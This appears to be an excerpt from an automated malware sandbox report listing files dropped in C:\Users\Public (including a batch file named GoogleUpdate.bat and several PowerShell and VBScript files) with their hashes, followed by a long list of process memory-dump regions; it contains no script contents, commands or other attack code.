190a98490786fbdf8b189ea10697b7a6acebdaf0dcda11d7d6fde8c1df72af2fd4c5d0b2874d812e20307d609d25af354ff74ce2fd564a563b84912975f46b05

Download Submit
C:\Users\Public\GoogleUpdate.bat
MD5
311524c0e72f5c65f62bf73ffb57ee3c

SHA1
c917cb67fac476be24cd73eddafd21c7da79af15

SHA256
62da5d7a78b42aeed845e30f7360e42adb2cf77365386295ebc549d9ce0d4daa

SHA512
2d46fdb99392f85a47e1bf465f8948d1af139fda4176b3f058ad9f079a781a2167a2e7480883517cb01cb2bb675bd7dcb5f285cd957439c9119c5407fd209411

Download Submit
C:\Users\Public\Kill.ps1
MD5
2e1021023713f80d3d233d4a9467e6b2

SHA1
94ae0dd1fccbed177d354e39e99737293900b28a

SHA256
d532e0ef22db774861c441769b16edfc9df1e055423fcda74230d774ce09370a

SHA512
e9599bb5fc8766cf259dab6eaf7802f3be9a0a7da347cf93e8616d4239ef37a7d7eecb9f48d46498f4f6522cb2aa6bd2897bd8a7476c86913dc8247ddf8ace7f

Download Submit
C:\Users\Public\msi.ps1
MD5
ef299b25d1e217c84ba708b7b2697f21

SHA1
ecf50d1c5bfbbd8db4a193627d1f936804689b24

SHA256
9a4d9ba7cbf3e5d1a856805a9b797d8ea29b65aefc9f7f6529ec488bdb96bba4

SHA512
c57450d68262f9f600b427d909ad1e753445c474224d637f15494fd8b0ba17b5ccf1a1440a32c2d8d7c0d6e95a6f14cc9a8e9ca8427a4ed6978692afa36ff46b

Download Submit
C:\Users\Public\ss.vbs
MD5
98f69749329ccb2ee8d69288e04f2332

SHA1
3a8477b107a52cd0b96961d0666cf07ae5045d76

SHA256
771780d15b72c2d35c069cf0e7e53346f14ea6078609e7be090b5249bd040556

SHA512
372e0766f7ca026893720b42de5d34ef667723a0519210977c9ea5af275e6c82dfa3743b69e5cfeba529f9f90e1ca51644b20cfc63f9996a5450cd3da10244cf

Download Submit
memory/216-152-0x000001AD9C620000-0x000001AD9C622000-memory.dmp

Filesize
8KB

Download
memory/216-219-0x000001AD9C626000-0x000001AD9C628000-memory.dmp

Filesize
8KB

Download
memory/216-142-0x0000000000000000-mapping.dmp

Download
memory/216-153-0x000001AD9C623000-0x000001AD9C625000-memory.dmp

Filesize
8KB

Download
memory/228-207-0x00000292CB446000-0x00000292CB448000-memory.dmp

Filesize
8KB

Download
memory/228-202-0x0000000000000000-mapping.dmp

Download
memory/228-205-0x00000292CB440000-0x00000292CB442000-memory.dmp

Filesize
8KB

Download
memory/228-206-0x00000292CB443000-0x00000292CB445000-memory.dmp

Filesize
8KB

Download
memory/828-239-0x000001FF62C60000-0x000001FF62C62000-memory.dmp

Filesize
8KB

Download
memory/828-237-0x0000000000000000-mapping.dmp

Download
memory/828-241-0x000001FF62C66000-0x000001FF62C68000-memory.dmp

Filesize
8KB

Download
memory/828-240-0x000001FF62C63000-0x000001FF62C65000-memory.dmp

Filesize
8KB

Download
memory/924-258-0x000000000040D09E-mapping.dmp

Download
memory/924-260-0x0000000003150000-0x0000000003151000-memory.dmp

Filesize
4KB

Download
memory/928-190-0x000001EF763E3000-0x000001EF763E5000-memory.dmp

Filesize
8KB

Download
memory/928-199-0x000001EF763E6000-0x000001EF763E8000-memory.dmp

Filesize
8KB

Download
memory/928-189-0x000001EF763E0000-0x000001EF763E2000-memory.dmp

Filesize
8KB

Download
memory/928-173-0x0000000000000000-mapping.dmp

Download
memory/932-131-0x000001AE10DF6000-0x000001AE10DF8000-memory.dmp

Filesize
8KB

Download
memory/932-114-0x0000000000000000-mapping.dmp

Download
memory/932-129-0x000001AE10DF3000-0x000001AE10DF5000-memory.dmp

Filesize
8KB

Download
memory/932-120-0x000001AE29B30000-0x000001AE29B31000-memory.dmp

Filesize
4KB

Download
memory/932-128-0x000001AE10DF0000-0x000001AE10DF2000-memory.dmp

Filesize
8KB

Download
memory/932-123-0x000001AE29CE0000-0x000001AE29CE1000-memory.dmp

Filesize
4KB

Download
memory/1020-251-0x0000000000000000-mapping.dmp

Download
memory/1352-256-0x000001F776C83000-0x000001F776C85000-memory.dmp

Filesize
8KB

Download
memory/1352-255-0x000001F776C80000-0x000001F776C82000-memory.dmp

Filesize
8KB

Download
memory/1352-253-0x0000000000000000-mapping.dmp

Download
memory/1356-212-0x000001EE7C3C0000-0x000001EE7C3C2000-memory.dmp

Filesize
8KB

Download
memory/1356-235-0x00000217C3793000-0x00000217C3795000-memory.dmp

Filesize
8KB

Download
memory/1356-208-0x0000000000000000-mapping.dmp

Download
memory/1356-214-0x000001EE7C3C3000-0x000001EE7C3C5000-memory.dmp

Filesize
8KB

Download
memory/1356-236-0x00000217C3796000-0x00000217C3798000-memory.dmp

Filesize
8KB

Download
memory/1356-231-0x0000000000000000-mapping.dmp

Download
memory/1356-218-0x000001EE7C3C6000-0x000001EE7C3C8000-memory.dmp

Filesize
8KB

Download
memory/1356-234-0x00000217C3790000-0x00000217C3792000-memory.dmp

Filesize
8KB

Download
memory/1752-252-0x0000000000000000-mapping.dmp

Download
memory/2036-225-0x0000023740C36000-0x0000023740C38000-memory.dmp

Filesize
8KB

Download
memory/2036-224-0x0000023740C33000-0x0000023740C35000-memory.dmp

Filesize
8KB

Download
memory/2036-226-0x0000023740C38000-0x0000023740C39000-memory.dmp

Filesize
4KB

Download
memory/2036-223-0x0000023740C30000-0x0000023740C32000-memory.dmp

Filesize
8KB

Download
memory/2036-220-0x0000000000000000-mapping.dmp

Download
memory/2200-261-0x0000000005480000-0x0000000005481000-memory.dmp

Filesize
4KB

Download
memory/2200-257-0x000000000040D09E-mapping.dmp

Download
memory/2264-215-0x0000000000000000-mapping.dmp

Download
memory/2304-244-0x0000000000000000-mapping.dmp

Download
memory/2944-200-0x0000026FC0240000-0x0000026FC0242000-memory.dmp

Filesize
8KB

Download
memory/2944-201-0x0000026FC0243000-0x0000026FC0245000-memory.dmp

Filesize
8KB

Download
memory/2944-204-0x0000026FC0246000-0x0000026FC0248000-memory.dmp

Filesize
8KB

Download
memory/2944-192-0x0000000000000000-mapping.dmp

Download
memory/3024-259-0x0000000000000000-mapping.dmp

Download
memory/3080-217-0x0000000000000000-mapping.dmp

Download
memory/3512-246-0x0000000000000000-mapping.dmp

Download
memory/3512-248-0x000001E9E97A0000-0x000001E9E97A2000-memory.dmp

Filesize
8KB

Download
memory/3512-249-0x000001E9E97A3000-0x000001E9E97A5000-memory.dmp

Filesize
8KB

Download
memory/3632-227-0x0000000000000000-mapping.dmp

Download
memory/3632-233-0x00000212F0266000-0x00000212F0268000-memory.dmp

Filesize
8KB

Download
memory/3632-229-0x00000212F0260000-0x00000212F0262000-memory.dmp

Filesize
8KB

Download
memory/3632-230-0x00000212F0263000-0x00000212F0265000-memory.dmp

Filesize
8KB

Download
memory/3656-155-0x0000000000000000-mapping.dmp

Download
memory/3656-170-0x000001B1AF213000-0x000001B1AF215000-memory.dmp

Filesize
8KB

Download
memory/3656-169-0x000001B1AF210000-0x000001B1AF212000-memory.dmp

Filesize
8KB

Download
memory/3656-171-0x000001B1AF216000-0x000001B1AF218000-memory.dmp

Filesize
8KB

Download
memory/3732-140-0x0000000000000000-mapping.dmp

Download
memory/3872-245-0x0000000000000000-mapping.dmp

Download